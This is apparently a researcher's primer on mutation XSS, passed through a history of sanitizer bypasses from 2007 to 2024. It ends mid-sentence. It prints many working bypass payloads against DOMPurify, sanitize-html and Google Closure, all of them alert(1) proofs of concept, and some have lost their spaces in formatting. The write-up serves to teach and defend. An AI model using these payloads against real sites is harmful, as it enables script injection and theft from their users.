MXSS Evolution and Timeline: A primer to MXSS

2024-09-03

MXSS Evolution and Timeline

Note this a document which I created while working on the MXSS video series https://youtu.be/aczTceXp49U, its very raw just random thoughts added here, if you want anything to change. feel free to pr.

How Do HTML Sanitizers Work?

Sanitizers are tools designed to filter harmful content from HTML, making it safe to insert into a webpage. The process involves several steps:

Parsing: The HTML content is parsed into a DOM tree on either the server or in the browser.
Sanitization: The sanitizer iterates through the DOM tree to remove dangerous or harmful content.
Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
Re-parsing: The serialized HTML is assigned to innerHTML, triggering another parsing process.
Appending to Document: The final, sanitized DOM tree is appended to the document.

However, despite these steps, sanitizers—especially server-side ones—can fail due to parser differentials between server and client. A server-side sanitizer might miss dangerous content that behaves differently when parsed by a browser. A typical example is when content is treated as RAWTEXT on the server but as active HTML in the browser.

Issue with Server-Side Sanitization: HTML Parser Differentials

Server-side sanitization can introduce problems due to the differences in how HTML is parsed by the browser versus the server. Using the same parser for both sanitization and insertion is often recommended.

For example, with the sanitize-html library:

1var dirty = "<svg><style><img src=x onerror=alert(1)></style>";
2var clean = sanitizeHtml(dirty, {
3    allowedTags: sanitizeHtml.defaults.allowedTags.concat(['style', 'svg'])
4});

In this case, sanitize-html does not remove the text inside the <style> tag, thinking it won’t be rendered as it’s RAWTEXT. However, the browser treats <style> inside an SVG differently, causing it to be parsed as HTML, and thus the malicious <img> tag is executed.

Earliest MXSS Exploit: Yosuke Hasegawa (2007)

The earliest recorded instance of Mutation XSS was discovered by Yosuke Hasegawa in 2007. This vulnerability involved Internet Explorer and its handling of the alt attribute. Hasegawa noticed that an attribute with two backticks (“alt=onerror=alert(1)”) caused IE to strip the quotes, leading to an XSS vulnerability. This became the first documented case of Mutation XSS.

Payload:

1<img src="x" alt="``onerror=alert(1)" />

Read more about this discovery on Hasegawa’s blog here.

MXSS from 2007 to 2013

Between 2007 and 2013, various researchers, including Mario Heiderich, LeverOne, Gareth Heyes, explored and documented MXSS vulnerabilities. One notable case was Mario’s discovery in 2011 (Mozilla bug 650001) that showed how SVG content could trigger MXSS through innerHTML mutations.

Payload:

1<!doctype html><svg><style>&lt;img src=x onerror=alert(1)&gt;<p>

The slackers group where lot of this stuff shared and I don’t think it was called MXSS at that time: https://web.archive.org/web/20131110003021/http://sla.ckers.org/forum/list.php?2,page=1

Mario’s 2013 Paper: The InnerHTML Apocalypse

In Mario’s paper, the attacker prepares an HTML or XML string that seems safe during the first parsing. However, upon insertion into the browser’s DOM using innerHTML, the browser mutates the string unpredictably. This mutated structure can allow the execution of JavaScript even after sanitization.

In Mario’s 2013 talk at Hack in Paris titled “The InnerHTML Apocalypse”, he demonstrated how MXSS could bypass even the most well-secured applications through these mutations.

Learn more about his research here.

Read his paper: mXSS Attacks: 2013.

Gareth Heyes and MXSS (2012-2015)

Gareth Heyes was another researcher involved in MXSS research. Gareth’s tweets from that period document numerous payloads that triggered MXSS in IE:

<% a=%&gt<iframe/onload=alert(1)//> #mxss IE<=9
<%/z=%&gt<p/onresize=alert(1)//>

These tweets from 2014 here and here discuss the IE payloads and their effects.

Gareth Edge MXSS 2018 and DOMPurify Bypass

Payload:

1	<title>&lt/title&gt&ltimg&sol;src=&quot&quotonerror&equals;alert(1)&gt

Description
Edge just decodes entities inside title

Link
http://www.thespanner.co.uk/2018/07/29/bypassing-dompurify-with-mxss/

Masato DOMPurify Closure Bypass and Google XSS Feb 2019

Description:
In the browser’s DOMParser API, the JavaScript is considered disabled, content inside the <noscript> tag is interpreted as RAWTEXT. So, When using DOMParser, everything inside <noscript> is treated as raw text. However, once inserted into the page with JavaScript enabled, the contents of the <noscript> tag are re-parsed and executed as HTML.

Google XSS Payload: Closure sanitization bypass

1<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Link to patch:
https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa

Dompurify bypass Payload:

1> DOMPurify.sanitize("a<noscript><p id='</noscript><img src=x onerror=alert(1)>'></p></noscript>", {ADD_TAGS: ['noscript']});
2< "a<noscript><p id="</noscript><img src=x onerror=alert(1)>"></p></noscript>

Masato noembed MXSS in FF and Chrome Feb 2019

Description:
Chrome decodes HTML entities inside <noembed> tags when it is parsed by DOMParser APIs.
Firefox decodes HTML entities inside <noscript> tags when it is parsed by DOMParser APIs. Payload:

1	> new DOMParser().parseFromString('A <noembed> B &lt;/noembed&gt; C &lt;img src=x onerror=alert(1)&gt;  D </noembed> E','text/html').body.innerHTML
2< "A <noembed> B </noembed> C <img src=x onerror=alert(1)>  D </noembed> E"
3A <noscript> B &lt;/noscript&gt; C &lt;img src=x onerror=alert(1)&gt; D </noscript> E

Links:
https://issues.chromium.org/issues/40090296
https://bugzilla.mozilla.org/show_bug.cgi?id=1528997

MXSS 2019 SecurityMB:

Chrome bug:https://issues.chromium.org/issues/40050167

Switch:SVG to HTML

Payload:

1<svg></p><style><gtitle="</style><imgsrconerror=alert(1)>">

Description:

<svg><p>gets parsed to:<svg></svg><p></p>
However, interesting thing happens if you put closing tag</p>in<svg>:
<svg></p>gets parsed to<svg><p></p></svg>.
So now the opening<p>is within<svg>which means that it will get out eventually when it is written to the DOM tree.

Links:

Spec bug:https://github.com/whatwg/html/issues/5113
Chrome issue:https://issues.chromium.org/issues/40050167
Blog:https://research.securitum.com/dompurify-bypass-using-mxss/

Other variants:

1<svg></p><textarea><title><style></textarea><imgsrc=xonerror=alert(1)></style></title></svg>2or3<svg></p><textarea><desc><style></textarea><imgsrc=xonerror=alert(1)></style></desc></svg>4<math></p><textarea><mi><style></textarea><img src=x onerror=alert(1)></mi></math>

Namespace Switching MXSS SecurityMB 2020

Payload

1<form>2<math><mtext>3</form><form>4<mglyph>5<style></math><img src onerror=alert(1)>

DescriptionHTML to SVG namespace Switch:

The img tag ends up as a child of a style tag in the HTML namespace due to the presence of mtext during the first parsing stage. As a result, DOMPurify doesn’t remove it. While this HTML isn’t immediately dangerous, it undergoes a mutation since form tags can’t be nested in HTML. However, using a trick mentioned in the spec, it is possible to nest them during the first parsing stage. The parser mutates the form to conform to the spec.
On the second pass, the nested form is removed, and the mglyph element ends up directly below the mtext, switching it to the MathML namespace. This also changes the style element to MathML. Since img tags are not allowed in foreign content (like MathML), it moves back to the HTML namespace and is eventually executed.

Spec:If the adjusted current node is a MathML text integration point and the token is a start tag whose tag name is neither “mglyph” nor “malignmark”Link:https://html.spec.whatwg.org/multipage/parsing.html#tree-construction

Linkshttps://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/

Instead of style xmp can be used:

1DOMPurify.sanitize('<form><math><mtext></form><form><mglyph><xmp><img src=x onerror=alert(1)>',{ADD_TAGS:['xmp']})

Multiple variations of the same root cause namespace confusion:

Payload:

1<math><mtext><table><mglyph><style><imgsrc=xonerror="alert(1)"></table>or2<math><mtext><table><mglyph><style><!--</style><imgtitle="--&gt;&lt;img src=1 onerror=alert(1)&gt;">

Description for why table behaves that way:

Table tag has a parsing quirk called foster parenting, it moves the children if they are not allowed as children, so here mglyph style and img are all moved before the table

Other variant:

1<math><mtext><atitle='one'><audio>aa<altglyphdef><animatecolor><filter><fieldset><atitle='two'></fieldset>ccd</a>gg<mglyph><svg><mtext><style><atitle='</style><imgsrc=#onerror=alert(1)>'>

Important Points to consider from now on:

Main Root cause of MXSS in client-side sanitizer:It is possible that the output of this algorithm, if parsed with anHTML parser, will not return the original tree structure. Tree structures that do not roundtrip a serialize and reparse step can also be produced by theHTML parseritself, although such cases are typically non-conforming.
P(P(D)) ≠ P(D)
Actually it is Pn(D) ≠ Pn−1(D)
Non-Idempotency: that repeated parsing yields different results after each pass. This captures the essence of mutation in the browser’s parsing.
P here is parsing, D is the HTML string
Example:
D=<form><div></form><form></div></form>
P(D)=<form><div></form><form></div></form></form>
P(P(D))=<form><div></div></form>
In the HTML namespace, children of a <style> <xmp> tag are treated as RAWTEXT state or just text. However, in SVG and MathML namespaces, children of the <style> tag are treated as actual elements, which can cause different parsing behavior.
Comments within a <style> tag are ignored in HTML, but in SVG and MathML, comments inside a <style> tag are not ignored and can affect how the content is parsed.
HTML entities (like &) are decoded in SVG and MathML, potentially altering the content during parsing.
In the case of tables, the parser uses a concept called “fostering parent,” which moves unwanted or misplaced elements outside of the table and continues with the parsing, ensuring the table structure remains correct.
The <select> tag actively removes any child elements that are not allowed, ensuring only valid content is retained.
While HTML does not allow nested forms, during the first parsing pass, it’s possible to have a structure like <form><div></form><form></div></form>. However, in the next parsing pass, this will mutate to <form><div></form><form></div></form></form>, and eventually result in <form><div></form>. This behavior is part of how browsers ensure that the document follows the HTML specification, resolving nested form issues through mutation.
Referehttps://sonarsource.github.io/mxss-cheatsheet/#for more
We have 3 main namespaces: html, svg, math
Switch: In the first parsing, during sanitization, our payload that executes JavaScript exists in one namespace, making it appear as safe HTML. At this stage, the payload might be within style tag text content, as an attribute value, or even as a comment, none of which are directly executable. However, during the browser’s second HTML parsing, the content shifts to another namespace. As this switch happens, the payload is transformed, causing it to move out of the text content, attribute value, or comment where it was originally contained. This allows the embedded JavaScript to eventually execute.
1. Example:
  Style tag HTML to MATH switch:
  Payload:<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>
  Parser in Sanitizer:
  This weird form case mutates and creates following:<form><math><mtext><form><mglyph><style><img src=x><- Notice it became nested forms
  Parser in innerHTML:
  As nested forms are not allowed inner form is removed making following html:<form><math><mtext><mglyp><style><img src=x onerror=x>
  \
The goal is to exploit the non-idempotent nature of HTML parsing to fool sanitizers. In the first parsing, the HTML appears innocent, with potentially dangerous elements hidden in ways that the sanitizer won’t detect, such as within comments, attributes, or using namespaces like MathML or SVG. The sanitizer allows the document through, seeing it as safe. However, during the second parsing by the browser, the structure mutates—elements might shift between namespaces or become reinterpreted—revealing malicious content that can execute JavaScript or other harmful code, bypassing the initial sanitization.
Or
P(D)=Dsafe <- sanitization
P(P(D))=Dmalicious <- insertion to body

Masato’s numerous bypasses when removing forbidden tags:

Description: DOMPurify removes certain tags but preserves the content inside them, which can be exploited for Mutation XSS (MXSS) through namespace switching. For example, the style tag resides inside the HTML namespace within a foreignObject element. DOMPurify removes the foreignObject tag but retains its content, causing the remaining content to switch to the SVG namespace. As a result, the malicious content that was initially safe in the HTML namespace now becomes executable as SVG tags, leading to the execution of the payload. This exploit leverages the way DOMPurify handles tag removal without completely removing the content inside.

Similar variation to Securitymbbut use a tag which gets removed by DOMpurify inbetween them like<svg><foreignobject><p><- valid dom but after sanitization it turns<svg><p><- not valid dom, so

kicks out

So, when content is not ignored and inserted to body, mxss can happen with below payloads

Payloads:

1<svg><foreignobject><p><style><ptitle="</style><iframeonload&#x3d;alert(1)<!--"></style>2or34<math><annotation-xmlencoding="text/html"><p><style><ptitle="</style><iframeonload&#x3d;alert(1)<!--"></style>56//<svg><p><style><ptitle="</style><iframeonload=alert(1)<!--"></p></style></p></svg>78DOMPurify.sanitize('<svg><title><p><style><ptitle="</style><iframeonload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["title"]})910<svg><foreignobject><b><style><ptitle="</style><iframeonload&#x3d;alert(1)<!--"></style>1112DOMPurify.sanitize('<svg><desc><b><style><btitle="</style><iframeonload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["desc"]})1314DOMPurify.sanitize('<math><annotation-xmlencoding="text/html"><style><imgsrc=xonerror=alert(1)></style>',{"ADD_TAGS":['annotation-xml']})1516DOMPurify.sanitize('<math><mi><b><style><btitle="</style><iframeonload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["mi"]})1718document.write(DOMPurify.sanitize("x<noframes><svg><b><xmp><btitle='</xmp><img src=x onerror=alert(1)>'>",{ADD_TAGS:["xmp"]}))1920<xmp><svg><b><style><btitle='</style><imgsrc=xonerror=alert(1)>'>21<noembed><svg><b><style><btitle='</style><imgsrc=xonerror=alert(1)>'>2223<noframes><svg><b><style><btitle='</style><imgsrc=xonerror=alert(1)>'>2425<plaintext><svg><b><style><btitle='</style><imgsrc=xonerror=alert(1)>'>2627<iframe><svg><b><style><btitle='</style><imgsrc=xonerror=alert(1)>'>

Fix by Dompurify for above issue:

1/* Tags to ignore content of when KEEP_CONTENT is true */<-Justremovecontentstoo2constFORBID_CONTENTS=addToSet({}, ['annotation-xml','audio','colgroup','desc','foreignobject','head','math','mi','mn','mo','ms','mtext','script','style','template','thead','title','svg','video', ]);

A similar masato’s above variation in recent version by kevin mizu restricted DOMPurify 3.0.8 2024

Switch:Style tag HTML to SVGPayload:

1DOMPurify.sanitize(`<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">`, {2    CUSTOM_ELEMENT_HANDLING:{3        tagNameCheck:/.*/4    },5    FORBID_CONTENTS:[""]6});

Description:

Theelement is treated as a custom element due to the permissive custom element regex (tagNameCheck: /.*/). With FORBID_CONTENTS set to an empty array, bothandwithin the